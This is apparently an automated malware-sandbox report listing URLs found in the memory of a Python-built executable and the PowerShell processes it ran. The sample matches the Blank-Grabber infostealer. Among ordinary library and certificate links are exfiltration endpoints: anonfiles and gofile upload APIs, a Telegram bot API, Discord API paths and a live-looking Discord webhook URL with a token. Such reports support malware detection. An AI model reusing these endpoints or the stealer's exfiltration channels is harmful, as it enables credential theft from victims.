00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049688627.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048802049.000001F12AE54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2397711771.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397324147.000001F12B4EF000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397218402.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftNAV_CO~1.JSOy.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftTASKLI~1.TXTy.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2145008489.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2080721339.000001F12B4E9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2170214194.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172503654.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2079501485.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftXULSTO~1.JSOy.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload-
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050265595.000001F12B470000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050777050.000001F12B470000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE76000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050661555.000001F12AE79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYX
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2040645327.000001F12BC08000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041272550.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041841981.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2032706611.000001F128D69000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urlli?Z
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C25C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050892507.000001F12AEBD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4B4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C50C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
